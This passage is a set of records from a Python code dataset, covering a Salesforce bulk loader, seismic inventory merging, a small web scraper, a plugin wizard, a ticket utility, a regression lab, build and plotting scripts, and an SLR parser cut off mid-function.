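# Hedged helper sketch: long bulk loads can fail transiently, so the per-chunk calls below\r\n# could be wrapped in a naive retry (the attempt count and backoff are assumptions; the\r\n# salesforce_bulk calls are the same ones used in the loop):\r\ndef upload_with_retry(rows, attempts=3):\r\n    for attempt in range(attempts):\r\n        try:\r\n            job = bulk.create_insert_job(target_obj, contentType='CSV')\r\n            batch = bulk.post_batch(job, CsvDictsAdapter(iter(rows)))\r\n            bulk.wait_for_batch(job, batch)\r\n            bulk.close_job(job)\r\n            return\r\n        except Exception:  # the bulk client's real error types would be narrower\r\n            if attempt == attempts - 1:\r\n                raise\r\n            sleep(2 ** attempt)  # simple exponential backoff\r\n\r\n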
# Read the input file in batches and upload to SalesForce\r\nfor gm_chunk in pd.read_csv(input_file, chunksize=200, encoding=\"ISO-8859-1\"): #200-10000\r\n\r\n    input_slice = gm_chunk[list(sf_mapping.keys())].rename(columns=sf_mapping)\r\n    input_processed = input_slice.where((pd.notnull(input_slice)), None)\r\n\r\n    job = bulk.create_insert_job(target_obj, contentType='CSV')\r\n    records = input_processed.to_dict('records')\r\n    csv_iter = CsvDictsAdapter(iter(records))\r\n    batch = bulk.post_batch(job, csv_iter)\r\n    bulk.wait_for_batch(job, batch)\r\n    bulk.close_job(job)\r\n    print(\"Done. Accounts uploaded 200.\") #200->10000\r\n    break #ishi\r\n\r\nprint(\"Done. All Accounts uploaded\")\r\n","sub_path":"10_Account_household_bulk_load.py","file_name":"10_Account_household_bulk_load.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"340795373","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nUtilities for dealing with inventory objects.\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function,\n                        unicode_literals)\n\n\ndef combine_inventories(inv_list):\n    \"\"\"\n    Takes a list of inventories and recursively merges them together.\n\n    Returns a single merged Inventory object. The original list of\n    inventories is not changed.\n\n    :param inv_list: List. The list of Inventory objects to\n        be merged together\n    \"\"\"\n    if len(inv_list) == 1:\n        inv = inv_list.pop()\n        return inv\n    elif len(inv_list) > 1:\n        inv_a = inv_list.pop()\n        inv_b = inv_list.pop()\n        inv_list.insert(0, merge_inventories(inv_a, inv_b))\n        return combine_inventories(inv_list)\n    else:\n        return None\n\n\ndef merge_inventories(inv_a, inv_b):\n    \"\"\"\n    Takes two inventories, merges the contents of both.\n\n    Returns the combined inventory object without duplicates.\n    The original inventories will not be changed.\n\n    :param inv_a: Inventory A. Contents of that inventory will be prioritized.\n    :type inv_a: :class:`~obspy.core.inventory.inventory.Inventory`\n    :param inv_b: Inventory B.\n    :type inv_b: :class:`~obspy.core.inventory.inventory.Inventory`\n    \"\"\"\n    inv_a_networks = []\n    inv_a_stations = []\n    inv_a_channels = []\n    for net_a in inv_a:\n        inv_a_networks.append(net_a.alternate_code)\n        for sta_a in net_a.stations:\n            inv_a_stations.append(sta_a.code)\n            for cha_a in sta_a.channels:\n                inv_a_channels.append({'channel': cha_a.code,\n                                       'location': cha_a.location_code,\n                                       'start_date': cha_a.start_date\n                                       .strftime(\"%Y-%m-%dT%H:%M:%S.%f\"),\n                                       'end_date': cha_a.end_date\n                                       .strftime(\"%Y-%m-%dT%H:%M:%S.%f\")\n                                       })\n    for net_b in inv_b:\n        if net_b.alternate_code not in inv_a_networks:  # check networks\n            inv_a.networks.append(net_b)\n        else:  # network exists in both inventories, check stations\n            for sta_b in net_b:\n                if sta_b.code not in inv_a_stations:\n                    for net_a in inv_a:\n                        if net_a.code == net_b.code:\n                            net_a.stations.append(sta_b)\n                else:  # station exists in both inventories, check channels\n                    for cha_b in sta_b.channels:\n                        cha_b_dict = {'channel': cha_b.code,\n                                      'location': cha_b.location_code,\n                                      'start_date': cha_b.start_date\n                                      .strftime(\"%Y-%m-%dT%H:%M:%S.%f\"),\n                                      'end_date': cha_b.end_date\n                                      .strftime(\"%Y-%m-%dT%H:%M:%S.%f\")}\n                        # channel b not in station a channels\n                        if not [cha_a_dict for cha_a_dict in inv_a_channels\n                                if (cha_a_dict == cha_b_dict)]:\n                            for net_a in inv_a:\n                                if net_a.code == net_b.code:\n                                    for sta_a in net_a.stations:\n                                        if sta_a.code == sta_b.code:\n                                            sta_a.channels.append(cha_b)\n    return inv_a\n\n\ndef sort_inventory(inv):\n    \"\"\"\n    Returns a sorted inventory in network, station, location, channel,\n    starttime, endtime order\n\n    :param inv: Inventory. 
The Inventory object to sort.\n :returns: A sorted Inventory object.\n \"\"\"\n inv.networks.sort(key=lambda x: x.code)\n for network in inv.networks:\n network.stations.sort(key=lambda x: x.code)\n for station in network.stations:\n station.channels.sort(key=lambda x:\n \"{0}{1}{2}{3}\".format(x.location_code,\n x.code,\n x.start_date,\n x.end_date))\n return inv\n","sub_path":"PH5WebService/common/inventory_utils.py","file_name":"inventory_utils.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"495645819","text":"import requests\r\nfrom lxml import etree\r\n\r\ndef spider(url:str):\r\n my_headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.104 Safari/537.36',\r\n }\r\n request = requests.get(url=url, headers=my_headers)\r\n content = request.text\r\n\r\n res = parse_content(content)\r\n\r\ndef parse_content(text: str):\r\n sel = etree.HTML(text)\r\n content = sel.xpath(\"//div[@class='content']/text()\")\r\n final_content = \"\"\r\n for item in content:\r\n final_content += item.replace(\"\\t\", \"\")\r\n\r\n print(\"final\", final_content)\r\n\r\n return content\r\n\r\ndef run_spider(url:str):\r\n spider(url=url)\r\n\r\n\r\nif __name__ == '__main__':\r\n target_url = \"http://gongwen.1kejian.com/show-26-93077-1.html\"\r\n spider(url=target_url)\r\n","sub_path":"article_spider/article_spider/spider_perpage/page_spider.py","file_name":"page_spider.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"252443149","text":"# -*- coding: utf-8 -*-\n\nfrom os import environ\n\nfrom Components.config import config\nfrom Components.Label import Label\nfrom Components.Pixmap import Pixmap\nfrom Screens.Wizard import WizardSummary\nfrom Screens.WizardLanguage import WizardLanguage\n\nfrom StillPicture import StillPicture\n\nfrom Plugins.Extensions.ProjectValerie.DMC_Plugins.DMC_SyncExtras.Config import SyncConfig\nfrom Plugins.Extensions.ProjectValerie.__common__ import printl2 as printl\n\n#------------------------------------------------------------------------------------------\n\nclass PVMC_Wizard(WizardLanguage):\n\n\tdef __init__(self, session):\n\t\tif environ[\"LANGUAGE\"] == \"de\":\n\t\t\tself.xmlfile = config.plugins.pvmc.pluginfolderpath.value + \"DMC_Wizard_DE.xml\"\n\t\telse:\n\t\t\tif environ[\"LANGUAGE\"] == \"de_DE\":\n\t\t\t\tself.xmlfile = config.plugins.pvmc.pluginfolderpath.value + \"DMC_Wizard_DE.xml\"\n\t\t\telse:\n\t\t\t\tself.xmlfile = config.plugins.pvmc.pluginfolderpath.value + \"DMC_Wizard.xml\"\n\t\t\n\t\tWizardLanguage.__init__(self, session, showSteps = False, showStepSlider = False)\n\t\tself[\"wizard\"] = Pixmap()\n\t\tself[\"textTop\"] = Label()\n\t\tself[\"textCenter\"] = Label()\n\t\tself[\"textBottom\"] = Label()\n\t\t\n\t\tself[\"showiframe\"] = StillPicture(session)\n\n\tdef autostart(self, selection = None):\n\t\tif selection is None:\n\t\t\tselection = self.selection\n\t\tif selection == \"yes\":\n\t\t\tconfig.plugins.pvmc.autostart.value = True\n\t\telse:\n\t\t\tconfig.plugins.pvmc.autostart.value = False\n\t\tprintl(\"-> \" + str(config.plugins.pvmc.autostart.value), self)\n\n\tdef checkforupdate(self, selection = None):\n\t\tif selection is None:\n\t\t\tselection = self.selection\n\t\tif selection == \"yes\":\n\t\t\tconfig.plugins.pvmc.checkforupdate.value = 
\"Active\"\n\t\telse:\n\t\t\tconfig.plugins.pvmc.checkforupdate.value = \"Passive\"\n\t\tprintl(\" -> \" + str(config.plugins.pvmc.checkforupdate.value), self)\n\n\tdef uselocal(self, selection = None):\n\t\tif selection is None:\n\t\t\tselection = self.selection\n\t\tif selection == \"yes\":\n\t\t\tconfig.plugins.pvmc.uselocal.value = True\n\t\telse:\n\t\t\tconfig.plugins.pvmc.uselocal.value = False\n\t\tprintl(\"-> \" + str(config.plugins.pvmc.uselocal.value), self)\n\n\tdef language(self, selection = None):\n\t\tlang = \"en\"\n\t\tif selection is None:\n\t\t\tselection = self.selection\n\t\t\t\n\t\tif len(selection) == 2:\n\t\t\tlang = selection\n\t\t\n\t\tSyncConfig().getInstance().set(\"local\", lang)\n\t\tSyncConfig().getInstance().save()\n\n\tdef saveConfig(self):\n\t\tprintl(\"->\", self)\n\t\tconfig.plugins.pvmc.showwizard.value = False\n\t\tconfig.save() \n\t\tprintl(\"<- Saved !\", self)\n\n\tdef finishUp(self):\n\t\tprintl(\"->\", self)\n\t\tself[\"showiframe\"].finishStillPicture()\n","sub_path":"ValerieMediaCenter/DMC_Wizard.py","file_name":"DMC_Wizard.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"586456239","text":"from connections.Connection import Connection\nfrom utils.FileProcessors import FileProcessor\nimport utils.Logger as logger\n\n__author__ = 'dur'\nTICKET_PARAM = \"ticketServer\"\nSKIP_TICKETS = \"skipTickets\"\nEXPECTED_TICKET = \"expectedTicket\"\nNAME = \"TicketUtil: \"\n\n\ndef getTicket():\n\tconnection = Connection(\"/home/dur/Projects/ServerSide/config/connection_config.conf\")\n\tparams = readTempVars()\n\tconnection.connect(params[TICKET_PARAM], 80, \"/ticket\")\n\treturn connection.get_message()\n\n\ndef readTempVars():\n\ttempProcessor = FileProcessor(\"/home/dur/Projects/ServerSide/config/tempParams.conf\")\n\ttempProcessor.lockFile()\n\tparams = tempProcessor.readFile()\n\ttempProcessor.unlockFile()\n\treturn params\n\n\ndef setNextExpectedTicket(currentTicket):\n\tlogger.logInfo(NAME + \"Otrzymalem aktualny bilet \" + str(currentTicket))\n\ttempProcessor = FileProcessor(\"/home/dur/Projects/ServerSide/config/tempParams.conf\")\n\ttempProcessor.lockFile()\n\tparams = tempProcessor.readFile()\n\tif params[SKIP_TICKETS] != '':\n\t\tskipped = params[SKIP_TICKETS].split(\",\")\n\telse:\n\t\tskipped = None\n\tnewTicket = int(currentTicket) + 1\n\tskipped = removeAllSkippedLowerThen(skipped, newTicket)\n\twhile skipped.__contains__(str(newTicket)):\n\t\tskipped.remove(str(newTicket))\n\t\tnewTicket = int(newTicket) + 1\n\ttoRet = \"\"\n\tfor single in skipped:\n\t\ttoRet= toRet + str(single) + \",\"\n\ttoRet = toRet[:-1]\n\tparams[EXPECTED_TICKET] = str(newTicket)\n\tparams[SKIP_TICKETS] = toRet\n\ttempProcessor.writeToFile(params)\n\ttempProcessor.unlockFile()\n\tlogger.logInfo(NAME + \"Zwracam kolejny oczekiwany bilet: \" + str(newTicket))\n\treturn newTicket\n\n\ndef skipTicket(ticket):\n\ttempProcessor = FileProcessor(\"/home/dur/Projects/ServerSide/config/tempParams.conf\")\n\ttempProcessor.lockFile()\n\tparams = tempProcessor.readFile()\n\tcurrentTicket = params[EXPECTED_TICKET]\n\tif int(currentTicket) == int(ticket):\n\t\tparams[EXPECTED_TICKET] = setNextExpectedTicket(ticket)\n\telse:\n\t\ttoSkip = params[SKIP_TICKETS]\n\t\ttoRet = \"\"\n\t\tif(toSkip != None and len(toSkip) != 0):\n\t\t\tarray = toSkip.split(\",\")\n\t\t\tarray.append(ticket)\n\t\t\tfor single in sortStringsByIntValue(array):\n\t\t\t\ttoRet= toRet + str(single) + 
\",\"\n\t\t\ttoRet = toRet[:-1]\n\t\telse:\n\t\t\ttoRet += str(ticket)\n\t\tparams[SKIP_TICKETS] = toRet\n\ttempProcessor.writeToFile(params)\n\ttempProcessor.unlockFile()\n\n\ndef sortStringsByIntValue(stringArray):\n\tvalue = []\n\tfor a in stringArray:\n\t\tvalue.append(int(a))\n\treturn sorted(value)\n\n\ndef getCurrentExpectedTicket():\n\tparams = readTempVars()\n\treturn params[EXPECTED_TICKET]\n\n\ndef removeAllSkippedLowerThen(skipped, ticket):\n\tret = []\n\tif skipped != None and len(skipped) > 0:\n\t\tfor single in skipped:\n\t\t\tif int(single) >= int(ticket):\n\t\t\t\tret.append(single)\n\treturn ret","sub_path":"ServerSide/database/utils1/TicketUtil.py","file_name":"TicketUtil.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"558405918","text":"fname = input(\"Enter file name: \")\nif len(fname) < 1 : fname = \"mbox-short.txt\"\n\nh_count = {}\nfh = open(fname)\nfor line in fh:\n if line.startswith(\"From \"):\n words = line.split()\n word = words[5]\n h_count[word[0:2]] = h_count.get(word[0:2],0) + 1\n\nh_tuple = h_count.items()\n# print(h_tuple)\nfor hour,value in sorted(h_tuple):\n print(hour,value)\n","sub_path":"Course_2/Task_7.py","file_name":"Task_7.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"619964935","text":"#!/usr/bin/env python\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport pylab as pl\nimport numpy as np\n\n\ndf = pd.read_csv(\"/Users/advertmaster3/PycharmProjects/pythonProject2/ML_IBM/FuelConsumption.csv\")\n# take a look at the dataset\ndf.head()\n# summarize the data\n\ndf.describe()\n\ncdf = df[['ENGINESIZE', 'FUELCONSUMPTION_CITY','FUELCONSUMPTION_COMB', 'CO2EMISSIONS', 'FUELCONSUMPTION_COMB_MPG']]\ncdf.head(1000)\n\nviz = cdf[['ENGINESIZE','FUELCONSUMPTION_CITY','CO2EMISSIONS','FUELCONSUMPTION_COMB','FUELCONSUMPTION_COMB_MPG']]\nviz.hist()\n#plt.show()\n\n\nplt.scatter(cdf.FUELCONSUMPTION_CITY, cdf.CO2EMISSIONS, color='blue')\nplt.xlabel(\"FUELCONSUMPTION_CITY\")\nplt.ylabel(\"Emission\")\n#plt.show()\n\n\nmsk = np.random.rand(len(df)) < 0.8\ntrain = cdf[msk]\ntest = cdf[~msk]\n#print (test)\n\n\n\nplt.scatter(train.FUELCONSUMPTION_CITY, train.CO2EMISSIONS, color='blue')\nplt.xlabel(\"FUELCONSUMPTION_CITY\")\nplt.ylabel(\"Emissions\")\n#plt.show()\n\n\n\nfrom sklearn import linear_model\nregr = linear_model.LinearRegression()\ntrain_x = np.asanyarray(train[['FUELCONSUMPTION_CITY']])\ntrain_y = np.asanyarray(train[['CO2EMISSIONS']])\nregr.fit (train_x, train_y)\n# The coefficients\nprint ('Coefficients: ', regr.coef_)\nprint ('Intercept: ',regr.intercept_)\n\n\nplt.scatter(train.FUELCONSUMPTION_CITY, train.CO2EMISSIONS, color='blue')\nplt.plot(train_x, regr.coef_[0][0]*train_x + regr.intercept_[0], '-r')\nplt.xlabel(\"Engine size\")\nplt.ylabel(\"Emission\")\n\n\nfrom sklearn.metrics import r2_score\n\ntest_x = np.asanyarray(test[['FUELCONSUMPTION_CITY']])\ntest_y = np.asanyarray(test[['CO2EMISSIONS']])\ntest_y_ = regr.predict(test_x)\n\nprint(\"Mean absolute error: %.2f\" % np.mean(np.absolute(test_y_ - test_y)))\nprint(\"Residual sum of squares (MSE): %.2f\" % np.mean((test_y_ - test_y) ** 2))\nprint(\"R2-score: %.2f\" % r2_score(test_y , test_y_) )\nprint 
(regr.predict(test_x))\n\n\n\n\n\n\n","sub_path":"LAB1_ML_LINEAR.py","file_name":"LAB1_ML_LINEAR.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278637152","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport glob\nimport os\nimport Copan.System.Git\nimport Copan.System.Path\nfrom PyQt4 import uic\n\n\nDOIT_CONFIG = {\n 'default_tasks': [\n '01_version',\n '02_pyqtforms',\n ]\n}\n\n\ndef task_01_version():\n def write_file():\n\n if \"TOMTOOL_VERSION\" not in os.environ:\n try:\n version, _, _ = Copan.System.Git.get_git_build_number(\".\")\n except Exception:\n version = None\n else:\n version = os.environ[\"TOMTOOL_VERSION\"]\n\n if version:\n with open('data/version', 'wb') as f:\n f.write(version)\n\n return {\n 'verbosity': 2,\n 'targets': ['data/version'],\n 'actions': [(write_file,)],\n }\n\n\ndef task_02_pyqtforms():\n def get_forms():\n forms = {}\n for source in glob.iglob('data/forms/*.ui'):\n source_filename = Copan.System.Path.split(source)[-1]\n target_filename = source_filename.replace('.ui', '.py')\n target = os.path.join('TomTool', 'Generated', target_filename)\n forms[target] = source\n return forms\n\n def forms_actions():\n for (target, source) in get_forms().iteritems():\n with open(target, 'w') as f:\n uic.compileUi(source, f, True)\n return True\n\n forms = get_forms()\n return {\n 'verbosity': 2,\n 'actions': [(forms_actions,)],\n 'file_dep': forms.values(),\n 'targets': forms.keys(),\n }\n","sub_path":"dodo.py","file_name":"dodo.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"620379928","text":"################################### \n#\twe plot the metric variables\n#\tAlpha, Beta, Psi, and the \n#\tmass aspect \n#\t\n#\tNote that as DT = LAMBDA * DR,\n#\twe do not compare every time \n#\tstep for DR, 2*DR, & 4*DR\n#\n###################################\n\nimport matplotlib.pyplot as plt\nimport numpy as np \n \nhomeDir = \"/home/jripley/Documents/Research/SphericalCollapse/\" \ntxtFDir = \"/home/jripley/Documents/Research/SphericalCollapse/txtFiles/\" \npltFDir = \"/home/jripley/Documents/Research/SphericalCollapse/plotFiles/\" \n\nTOLERANCE = 0.0001\t# how small we're willing the denominator in the convergence test to be\n\ndef massAspectPlot(fileName):\n############# DATA FORMATTING ###########\n#\tsprintf(fileName_ELLIPTIC,\"%sXiPiDataFLAT_%d_%d_%d_%d_%.3f_%.3f_%.2f_%.2f_%.2f.txt\", \n#\t\t\ttxtFDir, NR, NT, RSTEPSAVE, TSTEPSAVE, DR, LAMBDA, A, DELTA, R0) ; \n#\t\t\t 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 \n# \tnote though: we only keep slides with not NaN; which is tSteps \n\tfileNameSave = fileName \n\tfileName= fileName.split(\"_\")\n\theader \t= fileName[0]\n\tNR \t\t= fileName[1]\n\tNT \t\t= fileName[2]\n\tRSSAVE \t= fileName[3]\n\tTSSAVE\t= fileName[4]\n\tDR \t\t= fileName[5]\n\tLAMBDA = fileName[6]\n\tA \t\t= fileName[7]\n\tDELTA \t= fileName[8]\n\tR0 \t= fileName[9]\n\t\n#\n#\tNOTE: DT = LAMBDA * DR \n#\n# \tfor each time step, the save format is \n#\tAlpha,Beta,Psi,massAspect;...\n#\n\tAlpha = []\n\tBeta = []\n\tPsi = []\n\tmAspt = []\n\twith open(\"{}{}.txt\".format(txtFDir, fileNameSave), \"r\") as f:\n\t\tfor line in f:\n\t\t\tAlphaLine = []\n\t\t\tBetaLine = []\n\t\t\tPsiLine = []\n\t\t\tmAsptLine = []\n\t\t\tline = line.split(\";\")[:-1]\n\t\t\tfor i in range(len(line)):\t\n\t\t\t\tval = 
line[i].split(\",\")\n\t\t\t\tAlphaLine.append(float(val[0]))\n\t\t\t\tBetaLine.append(float(val[1]))\n#\t\t\t\tPsiLine.append(2*(i*float(DR)*float(val[2])-1))\n\t\t\t\tPsiLine.append(float(val[2]))\n\t\t\t\tmAsptLine.append(float(val[3]))\t\n\t\t\tAlpha.append(AlphaLine)\n\t\t\tBeta.append(BetaLine)\n\t\t\tPsi.append(PsiLine)\n\t\t\tmAspt.append(mAsptLine)\t\n\t\n####################################################\n#\tCOMPUTE THE CONVERGENCE RATIO FOR EACH TIME STEP \n####################################################\n#\tTime to plot these...\t\n\tAlphaData = Alpha[0] \t\n\tBetaData = Beta[0] \t\n\tPsiData = Psi[0] \t\n\tmAsptData = mAspt[0] \t\n\tAlphaDataShift = [x - 1 for x in Alpha[0]]\t\n\tPsiDataShift = [x - 1 for x in Psi[0]]\t\n\txData = [ i * float(DR) * float(RSSAVE) for i in range(len(AlphaData)) ]\n##########\n#\tPlot the Alpha data\n\tplt.xlabel(\"DR*i\")\n\tplt.ylabel(\"field value\")\n\tplt.title(\"Alpha field value at time slice 0\".format(DR))\n\tplt.plot(xData, AlphaData)#, label=\"p(i*DT)\") \n#\tplt.legend()\n\tplt.savefig(\"{}AlphaPlot_0_{}.pdf\".format(pltFDir, fileNameSave)) \n\tplt.close(\"all\")\n##########\n#\tPlot the Beta data\n\tplt.xlabel(\"DR*i\")\n\tplt.ylabel(\"field value\")\n\tplt.title(\"Beta field value at time slice 0\".format(DR))\n\tplt.plot(xData, BetaData)#, label=\"p(i*DT)\") \n#\tplt.legend()\n\tplt.savefig(\"{}BetaPlot_0_{}.pdf\".format(pltFDir, fileNameSave)) \n\tplt.close(\"all\")\n##########\n#\tPlot the Psi data\n\tplt.xlabel(\"DR*i\")\n\tplt.ylabel(\"field value\")\n\tplt.title(\"Psi field value at time slice 0\".format(DR))\n\tplt.plot(xData, PsiData)#, label=\"p(i*DT)\") \n#\tplt.legend()\n\tplt.savefig(\"{}PsiPlot_0_{}.pdf\".format(pltFDir, fileNameSave)) \n\tplt.close(\"all\")\n###########\n#\tPlot the mass aspect data\n\tplt.xlabel(\"DR*i\")\n\tplt.ylabel(\"field value\")\n#\tplt.ylim([-1,10])\t\t\n\tplt.title(\"Mass aspect value at time slice 0\".format(DR))\n\tplt.plot(xData, mAsptData)#, label=\"p(i*DT)\") \n#\tplt.legend()\n\tplt.savefig(\"{}MassAspectPlot_0_{}.pdf\".format(pltFDir, fileNameSave)) \n\tplt.close(\"all\")\n##########\n#\tPLOT EVERYTHING\n\tplt.xlabel(\"DR*i\")\n\tplt.ylabel(\"field value\")\n#\tplt.ylim([-1,10])\t\t\n\tplt.title(\"All the variables\".format(DR))\n\tplt.plot(xData, AlphaDataShift, label=\"Alpha - 1\") \n\tplt.plot(xData, BetaData,\t\tlabel=\"Beta\") \n\tplt.plot(xData, PsiDataShift,\tlabel=\"Psi - 1\") \n#\tplt.plot(xData, mAsptData, \t\tlabel=\"MsAspct\") \n\tplt.legend()\n\tplt.savefig(\"{}AllTheVariables_0_{}.pdf\".format(pltFDir, fileNameSave)) \n\tplt.close(\"all\")\nif __name__ == \"__main__\":\n\tprint(\"(Xi,Pi) convergence testing)\")\n\tfileName = raw_input(\"Name of file:\")\n\tmassAspectPlot(fileName)\n\n","sub_path":"massAspectPlot.py","file_name":"massAspectPlot.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"204394278","text":"#Python CW3 Q4\r\n\r\ndef getDigits(s):\r\n \r\n char = list(s)\r\n output = \"\"\r\n\r\n for i in char:\r\n if i.isdigit() == True:\r\n output = output + str(i)\r\n return output\r\n\r\nresult = getDigits('**1.23a-42')\r\n\r\nprint(result)\r\n","sub_path":"Computational Maths/Workshop 9/WS9Q4.py","file_name":"WS9Q4.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"128577139","text":"\nimport copy\n\ngrammar = []\nnew_grammar = []\nterminals = []\nnon_terminals = 
[]\nI_n = {}\nshift_list = []\nreduction_list = []\naction_list = []\nrule_dict = {}\nSR = []\nRR = []\n\ndef Conflict():\n\tglobal SR, RR, shift_list, reduction_list\n\tconflict = False\n\tfor S in shift_list:\n\t\tfor R in reduction_list:\n\t\t\tif S[:2] == R[:2]:\n\t\t\t\tSR.append([S, R])\n\t\t\t\tconflict = True\n\n\tfor R1 in reduction_list:\n\t\tfor R2 in reduction_list:\n\t\t\tif R1 == R2:\n\t\t\t\tcontinue\n\n\t\t\tif R1[:2] == R2[:2]:\n\t\t\t\tRR.append(R1)\n\t\t\t\tconflict = True\n\n\treturn conflict\n\n\ndef read_grammar():\n\tglobal grammar, terminals, non_terminals, rule_dict\n\n\tfile_name = str(input(\"Enter Grammar File Name:: \"))\n\n\ttry:\n\t\tgrammar_file = open(file_name, \"r\")\n\texcept:\n\t\tprint(\"Cannot Find File Named\", file_name)\n\t\texit(0)\n\n\tfor each_grammar in grammar_file:\n\t\tgrammar.append(each_grammar.strip())\n\n\t\tif each_grammar[0] not in non_terminals:\n\t\t\tnon_terminals.append(each_grammar[0])\n\n\tfor each_grammar in grammar:\n\t\tfor token in each_grammar.strip().replace(\" \", \"\").replace(\"->\", \"\"):\n\t\t\tif token not in non_terminals and token not in terminals:\n\t\t\t\tterminals.append(token)\n\n\tfor l in range(1, len(grammar)+1):\n\t\trule_dict[l] = grammar[l-1]\n\n\ndef augmented_grammar():\n\tglobal grammar, new_grammar\n\tread_grammar()\n\tif \"'\" not in grammar[0]:\n\t\tgrammar.insert(0, grammar[0][0]+\"'\"+\"->\"+grammar[0][0])\n\n\tnew_grammar = []\n\tfor each_grammar in grammar:\n\t\tidx = each_grammar.index(\">\")\n\t\teach_grammar = each_grammar[:idx+1]+\".\"+each_grammar[idx+1:]\n\t\tnew_grammar.append(each_grammar)\n\n\ndef compute_I0():\n\tglobal new_grammar, non_terminals, I_n\n\taugmented_grammar()\n\n\tgrammar2add = []\n\tgrammar2add.append(new_grammar[0])\n\ti = 0\n\tfor each in grammar2add:\n\t\tcurrent_pos = each.index(\".\")\n\t\tcurrent_variable = each[current_pos+1]\n\n\t\tif current_variable in non_terminals:\n\t\t\tfor each_grammar in new_grammar:\n\t\t\t\tif each_grammar[0] == current_variable and each_grammar not in grammar2add:\n\t\t\t\t\tgrammar2add.append(each_grammar)\n\n\t\tI_n[i] = grammar2add\n\n\ndef GOTO():\n\tglobal grammar, non_terminals, terminals, I_n, shift_list\n\tcompute_I0()\n\n\tvariables = non_terminals + terminals\n\ti = 0\n\tcurrent_state = 0\n\tdone = False\n\t\n\twhile (not done):\n\t\tfor each_variable in variables:\n\t\t\tgrammar2add = []\n\t\t\ttry:\n\t\t\t\tfor each_rule in I_n[current_state]:\n\t\t\t\t\tif each_rule[-1] == \".\":\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\tdot_idx = each_rule.index(\".\")\n\n\t\t\t\t\tif each_rule[dot_idx+1] == each_variable:\n\t\t\t\t\t\t\n\t\t\t\t\t\trule = copy.deepcopy(each_rule)\n\t\t\t\t\t\trule = rule.replace(\".\", \"\")\n\t\t\t\t\t\trule = rule[:dot_idx+1]+\".\"+rule[dot_idx+1:]\n\t\t\t\t\t\tgrammar2add.append(rule)\n\n\t\t\t\t\t\tfor rule in grammar2add:\n\t\t\t\t\t\t\tdot_idx = rule.index(\".\")\n\t\t\t\t\t\t\tif rule[-1] == \".\":\n\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tcurrent_variable = rule[dot_idx+1]\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif current_variable in non_terminals:\n\t\t\t\t\t\t\t\t\tfor each_grammar in new_grammar:\n\t\t\t\t\t\t\t\t\t\tif each_grammar[0] == current_variable and each_grammar[1] != \"'\" and each_grammar not in grammar2add:\n\t\t\t\t\t\t\t\t\t\t\tgrammar2add.append(each_grammar)\n\n\t\t\texcept:\n\t\t\t\tdone = True\n\t\t\t\tbreak\n\n\t\t\tif grammar2add:\n\t\t\t\tif grammar2add not in I_n.values():\n\t\t\t\t\ti += 1\n\t\t\t\t\tI_n[i] = grammar2add\n\n\t\t\t\tfor k,v in 
I_n.items():\n\t\t\t\t\tif grammar2add == v:\n\t\t\t\t\t\tidx = k\n\t\t\t\t\n\t\t\t\tshift_list.append([current_state, each_variable, idx])\n\t\tcurrent_state += 1\n\n\ndef follow(var):\n\t\n\tglobal rule_dict, terminals\n\n\tvalue = []\n\tif var == rule_dict[1][0]:\n\t\tvalue.append(\"$\")\n\n\tfor rule in rule_dict.values():\n\t\t\n\t\tlhs, rhs = rule.split(\"->\")\n\n\t\tif var == rule[-1]:\n\t\t\tfor each in follow(rule[0]):\n\t\t\t\tif each not in value:\n\t\t\t\t\tvalue.append(each)\n\n\t\tif var in rhs:\n\t\t\tidx = rhs.index(var)\n\n\t\t\ttry:\n\t\t\t\tif rhs[idx+1] in non_terminals and rhs[idx+1] != var:\n\t\t\t\t\tfor each in follow(rhs[idx+1]):\n\t\t\t\t\t\tvalue.append(each)\n\t\t\t\telse:\n\t\t\t\t\tvalue.append(rhs[idx+1])\n\t\t\texcept:\n\t\t\t\tpass\n\treturn value\n\n\ndef first(nt):\n global non_terminals,rule_dict\n d1={}\n d2={}\n for i in non_terminals:\n d1[i]=[]\n d2[i]=[]\n for j in list(rule_dict.values()):\n if j[0]==i and j[3]!=j[0]:\n if j[3] in non_terminals:\n d1[i].append(j[3])\n else:\n d2[i].append(j[3])\n l=d2[nt]\n for i in d1[nt]:\n d1[nt].extend(d1[i])\n for i in d1[nt]:\n l=l+d2[i]\n \n return l\n\ndef reduction():\n\tglobal I_n, rule_dict, reduction_list\n\t\n\treduction_list.append([1, \"$\", \"Accept\"])\n\n\tfor item in I_n.items():\n\t\ttry:\n\t\t\tfor each_production in item[1]:\n\t\t\t\tlhs, rhs = each_production.split(\".\")\n\n\t\t\t\tfor rule in rule_dict.items():\n\n\t\t\t\t\tif lhs == 